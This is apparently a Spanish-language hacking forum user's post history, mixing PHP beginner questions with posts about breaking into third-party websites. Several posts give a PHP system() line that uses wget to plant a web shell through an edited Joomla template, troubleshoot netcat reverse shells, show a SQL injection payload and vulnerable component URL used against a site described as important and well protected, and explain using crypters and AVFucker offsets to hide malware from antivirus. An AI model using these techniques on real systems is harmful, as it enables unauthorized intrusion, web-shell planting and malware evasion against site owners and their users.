Ese archivo usa el lenguaje PHP si es lo que necesitas saber...
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Dudas y pedidos generales / Re:A que aplicacion cerresponde el archivo *.php??
Septiembre 08, 2012, 12:10:41 PM #2
Bugs y Exploits / Re:WAppEx suite para auditar aplicaciones web, de los creadores de Havij
Agosto 01, 2012, 11:53:04 AM
Era problema del firewall, aunque le permití todo, no le dejaria conectarse al 100%, asique tuve que hacerlo con el proceso del firewall eliminado. Gracias de todas formas!
#3
Bugs y Exploits / Re:WAppEx suite para auditar aplicaciones web, de los creadores de Havij
Julio 31, 2012, 09:29:49 AM
Le doy a registrar y no hace nada, quiza ya hayan quitado la version de prueba
#4
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 15, 2012, 09:12:22 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaApunto a mi ip directamente, ya que rara vez reinicio el router y casi siempre tengo la misma
Caundo usas el reverse shell apuntas a tu no-ip, dyndns, etc??
#5
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 11, 2012, 05:36:19 PM
he probado con los puertos 888 y 31337 también, aquí te dejo la prueba de que está abierto:
y el netcat lo dejo asi:
Saludos y gracias
y el netcat lo dejo asi:
Saludos y gracias
#6
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 11, 2012, 04:28:50 PM
gracias, es un tutorial basico pero muy bien explicado.
Una pregunta, por que casi nunca se me conectan los host al netcat? tengo los puertos abiertos y he probado con el comando nc y con el Ncat tambíen, y mu rara vez se me conecta, siempre con el firewall desactivado.
puede ser que el servidor tenga bloqueados los puertos y no puedo usar cualquiera?
Saludos
Una pregunta, por que casi nunca se me conectan los host al netcat? tengo los puertos abiertos y he probado con el comando nc y con el Ncat tambíen, y mu rara vez se me conecta, siempre con el firewall desactivado.
puede ser que el servidor tenga bloqueados los puertos y no puedo usar cualquiera?
Saludos
#7
Bugs y Exploits / Re:Upload shell en Joomla
Junio 27, 2012, 12:26:30 PM
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos
EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos
Saludos
EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos
#8
Bugs y Exploits / Re:Upload shell en Joomla
Junio 27, 2012, 12:03:21 PM
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:
Qué podría hacer para solucionarlo? Saludos
CitarNot Acceptable
An appropriate representation of the requested resource /administrator/index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Qué podría hacer para solucionarlo? Saludos
#9
Dudas y pedidos generales / Re:SQLi Difícil
Julio 15, 2011, 04:18:39 PM
Bueno, no se muco sobre linux, esa es mi debilidad, he empezado hace muy poco en seguridad web, por eso, ya que habia encontrado una vulnerabilidad de SQLi queria meterme por ahí, y por eso preguntaba si a alguien le habia pasado algo parecido.
Seguiré buscando por ahí como tu dices Comandante Linux
Un saludo y gracias
Seguiré buscando por ahí como tu dices Comandante Linux
Un saludo y gracias
#10
Dudas y pedidos generales / Re:SQLi Difícil
Julio 15, 2011, 11:48:50 AM
Si, probe, pero no hay permisos
Es un servidor bastante protegido, ya que es importante, no es una página cualquiera
Es un servidor bastante protegido, ya que es importante, no es una página cualquiera
#11
Dudas y pedidos generales / [SOLUCIONADO] SQLi Difícil
Julio 15, 2011, 11:14:51 AM
Buenas, el otro día me puse a buscar vulnerabilidades a una web basada en joomla, y encontre SLQi en el componente com_xmap,
Al entrar en esa url, da error de MySQL. El problema es que yo inyecto el union y todo eso en la url como en las demas webs, y no puedo conseguir el numero de tablas ni nada.,También le encontré RFI pero tiene la variable Allow_url_include Off
Por ejemplo si yo pongo esto: union+all+select+1,2,3,4,5## ,me tira este error:
Si alguien está dispuesto a ayudarme, le puedo pasar la url por MP
Gracias, un saludo, Er kali
Citarindex.php?option=com_xmap&tmpl=component&sitemap_id=2&Itemid=999&view='
Al entrar en esa url, da error de MySQL. El problema es que yo inyecto el union y todo eso en la url como en las demas webs, y no puedo conseguir el numero de tablas ni nada.,También le encontré RFI pero tiene la variable Allow_url_include Off
Por ejemplo si yo pongo esto: union+all+select+1,2,3,4,5## ,me tira este error:
Si alguien está dispuesto a ayudarme, le puedo pasar la url por MP
Gracias, un saludo, Er kali
#12
Dudas y pedidos generales / Re:Duda indetectar server
Junio 28, 2011, 08:44:53 AM
Buenas,
Respondiendo a tu primera pregunta, hay dos tipos de crypters, los scantime y los runtime
Los runtime, al ejecutar el server, se desencrypta en memoria, éstos son los mas usados y mejores
Los scantime solo te van a hacer indetectable el server al pasar el antivirus con el click derecho, pero el ejecutar el server encryptado, éste se va desencryptar y va a copiar el serer original en una carpeta temporal, y ahí el antivirus te lo va a detectar.
Si quieres una explicacion mas detallada de como funciona cada crypter, busca algun tutorial por ahi, que los hay.
A la segunda pregunta: El nombre del offset que tienes que saber son los que te deja sin detectar en la carpeta donde hiziste el AVFucker, normalmente llamada "temp". Analiza esa carpeta y borra todo lo que te detecte, y los archivos que queden sin detectar, pues esos son los offsets indetectables
Saludos espero haberte ayudado
Respondiendo a tu primera pregunta, hay dos tipos de crypters, los scantime y los runtime
Los runtime, al ejecutar el server, se desencrypta en memoria, éstos son los mas usados y mejores
Los scantime solo te van a hacer indetectable el server al pasar el antivirus con el click derecho, pero el ejecutar el server encryptado, éste se va desencryptar y va a copiar el serer original en una carpeta temporal, y ahí el antivirus te lo va a detectar.
Si quieres una explicacion mas detallada de como funciona cada crypter, busca algun tutorial por ahi, que los hay.
A la segunda pregunta: El nombre del offset que tienes que saber son los que te deja sin detectar en la carpeta donde hiziste el AVFucker, normalmente llamada "temp". Analiza esa carpeta y borra todo lo que te detecte, y los archivos que queden sin detectar, pues esos son los offsets indetectables
Saludos espero haberte ayudado
#13
Dudas y pedidos generales / Re:[Duda] [Taller de PHP] Formularios
Junio 08, 2011, 10:24:06 AM
Ahora si, gracias a los dos, no me acurdaba de la función is_numeric
Saludos ya pueden cerrar el tema si quieren
Saludos ya pueden cerrar el tema si quieren
#14
Dudas y pedidos generales / Re:[Duda] [Taller de PHP] Formularios
Junio 06, 2011, 05:16:15 PM
Si pero yo no quiero cambiar el tipo de variable, sino saber que tipo es, según lo que el usuario escriba en el campo de texto.
Alomejor en php no se puede hacer, de php se lo básico
He buscado en google y tampoco he encontrado nada
Saludos
Alomejor en php no se puede hacer, de php se lo básico
He buscado en google y tampoco he encontrado nada
Saludos
#15
Dudas y pedidos generales / Re:[Duda] [Taller de PHP] Formularios
Junio 06, 2011, 04:53:24 PM
Creo que no me he explicado bien. lo que quiero hacer es esto:
Pero claro, siempre devuelve tipo string, entonces aunque solo introduzcas en el campo de texto números, no te lo va a evaluar como integer, entonces me preguntaba como solucionarlo
Saludos y gracias contestar rápido
Pero claro, siempre devuelve tipo string, entonces aunque solo introduzcas en el campo de texto números, no te lo va a evaluar como integer, entonces me preguntaba como solucionarlo
Saludos y gracias contestar rápido
#16
Dudas y pedidos generales / [SOLUCIONADO] [Taller de PHP] Formularios
Junio 06, 2011, 04:40:46 PM
Buenas, estoy haciendo el último ejercicio y quería saber como obtener el tipo de variable introducida en un label de un formulario, porque obteniendolo normalmente con gettype siempre da string,, ya que esta en una variable entrre comillas digamos.
Saludos
Saludos
Páginas1